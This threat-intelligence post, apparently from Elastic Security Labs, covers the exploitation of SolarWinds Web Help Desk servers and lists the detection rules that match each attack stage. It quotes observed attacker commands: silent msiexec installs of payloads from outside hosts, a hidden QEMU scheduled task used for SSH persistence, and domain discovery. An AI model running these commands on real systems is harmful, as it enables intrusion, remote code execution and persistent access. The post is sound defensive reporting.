Summary
- On February 6, 2026, Microsoft reported the exploitation of SolarWinds Web Help Desk (WHD) servers
- The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access
- While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551
- Elastic Security Labs does not observe telemetry events related to this activity as of the date of this publication
- Elastic Defend provides comprehensive visibility, along with 5 prebuilt prevention and 11 prebuilt detection capabilities across this reported activity
Background
Multiple intrusions have been publicly reported starting on February 6, 2026 stemming from Internet-connected servers utilizing SolarWinds Web Help Desk software. This exploitation activity reportedly first occurred in December 2025.
Given the number of recent CVEs affecting this product, it’s not yet clear which of several CVEs is directly responsible for these campaigns. Below are the CVEs involved in this reported activity:
CVE-2025-26399- SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution VulnerabilityCVE-2025-40536- SolarWinds Web Help Desk Security Control Bypass VulnerabilityCVE-2025-40551- SolarWinds Web Help Desk Deserialization of Untrusted Data Remote Code Execution Vulnerability
Below is a table of the vulnerability descriptions and the impacted product versions:
| Vulnerability ID | Vulnerability Description | Affected Products |
|---|---|---|
| CVE-2025-26399 | Unauthenticated AjaxProxy deserialization remote code execution vulnerability | SolarWinds Web Help Desk 12.8.7 and all previous versions |
| CVE-2025-40536 | Susceptible to a security control bypass vulnerability | SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions |
| CVE-2025-40551 | Untrusted data deserialization vulnerability | SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions |
After exploitation, the threat actors are documented to have abused otherwise legitimate RMM software to gain persistent access to victim environments. Additional reporting noted the use of Velociraptor being abused for post-compromise execution, such as disabling Microsoft Defender and setting up a Cloudflare tunnel.
Once the TAs had gained network access, they configured a scheduled task to start a QEMU virtual system to maintain remote access. Credential dumping activity was also observed, including the use of DCSync and the extraction of the NTDS.dit database from a Windows domain controller.
The following sections detail Elastic Security detection and prevention rules that can detect and mitigate these intrusive activities.
Execution Flow
Initial access
Following the successful exploitation of the SolarWinds Web Help Desk (WHD), the threat actors established an interactive shell. Observations indicate a heavy reliance on "living-off-the-land" (LotL) techniques, where legitimate system utilities and programs such as RMMs are used to perform malicious actions.
The original attack chain happens from the WHD service wrapper (wrapper.exe) spawning java.exe which then spawns the Windows command processor (cmd.exe). An Elastic SIEM rule has been created for the community to detect unusual child process activity from the SolarWinds Web Help Desk application.
any where host.os.type == "windows" and
(
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)SIEM Rule - Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
One of the initial attack chains involved installing a remotely-hosted MSI installer from an anonymous file-hosting service called Catbox. The following command-line was observed:
msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msiIn order to detect this activity, Elastic has a SIEM prebuilt rule to detect remote installation of MSI files here, and an endpoint behavior protection here.
Suspicious child processes from Java and SolarWinds WHD represent the earliest phase of this attack, which resulted in the installation of an RMM MSI file. This remote monitoring and management utility provides some of the functionality of a conventional backdoor while resembling benign administrative software.
Discovery
After the RMM agent was configured, the threat group moved to hands-on keyboard activity performing reconnaissance and discovery within the network.
They then leveraged the RMM agent tooling to perform discovery within the Windows network executing commands targeting information related to Active Directory. An observed command line is shown below:
net group "domain computers" /doAn existing SIEM rule designed to identify Windows account group discovery detects this reconnaissance technique and is available here.
Evasion
One of the more notable choices used by the threat actor in one campaign was the usage of open-source forensic tool, Velociraptor. While this legitimate tool is traditionally used to collect forensic artifacts from endpoints, the adversaries used it for code execution and file staging. The threat group silently installed Velociraptor using the remote MSI command shown below and a prebuilt Elastic Security rule is available:
msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msiThey followed this up with an installation of the Cloudflare Tunnel client (Cloudflared) with the following command:
msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msiEchoing trends observed throughout 2025 and described in the Elastic Global Threat Report, adversaries increasingly abuse trusted networks for transport encryption and to take advantage of benign reputation. The remote MSI installation rules discussed earlier in this article also apply in this case; however, installing a legitimate security tool is likely to appear benign to many enterprises. Cisco Talos has previously highlighted this emerging attacker trend involving the use of Velociraptor for post-compromise activity.
Other observations in this intrusion set included the threat actor disabling security controls such as Windows Defender and Window Firewall through registry key modifications. Existing Elastic SIEM and endpoint rules identify these attempts to undermine security settings.
Persistence
In order to maintain continued access, the threat actors set up a Windows scheduled task using the following command-line:
SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\<user>\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
</user>This scheduled task named TPMProfiler was configured to execute QEMU, a system-level virtualization and emulation tool. QEMU was then used to establish an SSH connection, facilitating continued access to the compromised system.
Elastic Security published and maintains a SIEM detection rule to detect the creation of this scheduled task.
In order to detect the QEMU tunnelling activity, Elastic Security has this Elastic Defend rule here and an Elastic prebuilt detection rule here.
Credential Access
As part of these attacks, Microsoft also mentioned credential dumping of the Active Directory Domain Database (ntds.dit). Elastic provides multiple detections for this behavior, including the rules referenced here and here.
Recommendations
- Apply the latest SolarWinds Web Help Desk patches.
- Rotate all service and administrative credentials that are associated with SolarWinds Web Help Desk.
- Conduct host-level reviews of any impacted servers and endpoints to identify unauthorized activity.
- Identify and remove any RMM usage associated with this activity. Review organizational policy and monitoring strategies for RMM tools.
Detecting SolarWinds WHD exploitation
Elastic Security prebuilt detection rules
- Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
- Potential Remote Install via MsiExec
- Remote File Execution via MSIEXEC
- Windows Account or Group Discovery
- Windows Defender Disabled via Registry Modification
- Persistence via Scheduled Job Creation
- NTDS or SAM Database File Copied
- Potential Credential Access via Windows Utilities
- Attempt to Establish VScode Remote Tunnel
- First Time Seen Commonly Abused Remote Access Tool Execution
- Potential Traffic Tunneling using QEMU
Elastic Defend prebuilt prevention rules
- Remote File Execution via MSIEXEC
- Suspicious Windows Defender Registry Modification
- Potential Traffic Tunneling with QEMU
- Connection to WebService by a Signed Binary Proxy
- Attempt to establish VScode Remote Tunnel
References
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | PowerShell | T1059.001 |
| Lateral Movement | Remote Service Session Hijacking | T1563 |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 |
| Persistence | Scheduled Task/Job | T1053.005 |